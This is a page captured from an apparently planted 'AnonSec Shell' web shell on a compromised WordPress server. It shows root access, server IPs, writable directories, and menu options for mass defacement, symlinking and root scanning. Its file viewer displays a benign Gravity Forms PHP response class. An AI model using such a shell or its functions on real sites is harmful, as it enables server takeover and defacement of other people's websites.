AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 18.219.130.101   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/gravityforms/includes/external-api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/gravityforms/includes/external-api/class-gf-api-response.php
<?php

namespace Gravity_Forms\Gravity_Forms\External_API;

/**
 * Class GF_API_Response
 *
 * An abstracted Response class used to standardize the responses we send back from an API Connector. Includes
 * standardized serialization and JSON methods to support saving the class to the Database.
 *
 * @since 2.5
 *
 * @package Gravity_Forms\Gravity_Forms\External_API
 */
abstract class GF_API_Response implements \JsonSerializable, \Serializable {

	/**
	 * The data for this response.
	 *
	 * @var array $data
	 */
	protected $data = array();

	/**
	 * The status for this response.
	 *
	 * @var array $status
	 */
	protected $status = array();

	/**
	 * The errors (if any) for this response.
	 *
	 * @var array $errors
	 */
	protected $errors = array();

	/**
	 * The meta data (if any) for this response.
	 *
	 * @var array $meta
	 */
	protected $meta = array();

	/**
	 * Set the status for the response.
	 *
	 * @param $status
	 */
	protected function set_status( $status ) {
		$this->status = $status;
	}

	/**
	 * Add data item.
	 *
	 * @param $item
	 */
	protected function add_data_item( $item ) {
		$this->data[] = $item;
	}

	/**
	 * Add an error message.
	 *
	 * @param $error_message
	 */
	protected function add_error( $error_message ) {
		$this->errors[] = $error_message;
	}

	/**
	 * Add a meta item to the response.
	 *
	 * @param $key
	 * @param $value
	 */
	protected function add_meta_item( $key, $value ) {
		$this->meta[ $key ] = $value;
	}

	/**
	 * Get the data for this response
	 *
	 * @return array
	 */
	public function get_data() {
		return $this->data;
	}

	/**
	 * Get any errors on this response.
	 *
	 * @return array
	 */
	public function get_errors() {
		return $this->errors;
	}

	/**
	 * Get the response status.
	 *
	 * @return array
	 */
	public function get_status() {
		return $this->status;
	}

	/**
	 * Get the response meta.
	 *
	 * @return array
	 */
	public function get_meta() {
		return $this->meta;
	}

	/**
	 * Determine if the response has any errors.
	 *
	 * @return bool
	 */
	public function has_errors() {
		return ! empty( $this->errors );
	}

	/**
	 * Get a specific piece of the data.
	 *
	 * @param $name
	 * @param int $index
	 *
	 * @return mixed|null
	 */
	public function get_data_value( $name, $index = 0 ) {
		if ( ! isset( $this->data[ $index ][ $name ] ) ) {
			return null;
		}

		return $this->data[ $index ][ $name ];
	}

	/**
	 * Standardization of the class when serialized and unserialized. Useful for standardizing how it
	 * is stored in the Database.
	 *
	 * @return string
	 */
	public function serialize() {
		return serialize( $this->__serialize() );
	}

	/**
	 * Prepares the object for serializing.
	 *
	 * @since 2.6.2
	 *
	 * @return array
	 */
	public function __serialize() {
		return array(
			'data'   => $this->data,
			'errors' => $this->errors,
			'status' => $this->status,
			'meta'   => $this->meta,
		);
	}

	/**
	 * Hydrate the Response data when unserializing.
	 *
	 * @param string $serialized
	 */
	public function unserialize( $serialized ) {
		$this->__unserialize( unserialize( $serialized ) );
	}

	/**
	 * Hydrates the object when unserializing.
	 *
	 * @since 2.6.2
	 *
	 * @param array $data The unserialized data.
	 *
	 * @return void
	 */
	public function __unserialize( $data ) {
		$this->data   = $data['data'];
		$this->errors = $data['errors'];
		$this->status = $data['status'];
		$this->meta   = $data['meta'];
	}

	/**
	 * Process data for JSON Encoding.
	 *
	 * @return array
	 */
	#[\ReturnTypeWillChange]
	public function jsonSerialize() {

		$response = array();

		$response['status'] = $this->status;
		$response['meta']   = $this->meta;

		if ( empty( $this->errors ) ) {
			$response['data'] = $this->data;
		}

		if ( ! empty( $this->errors ) ) {
			$response['errors'] = $this->errors;
		}

		return $response;
	}

}

Anon7 - 2022
AnonSec Team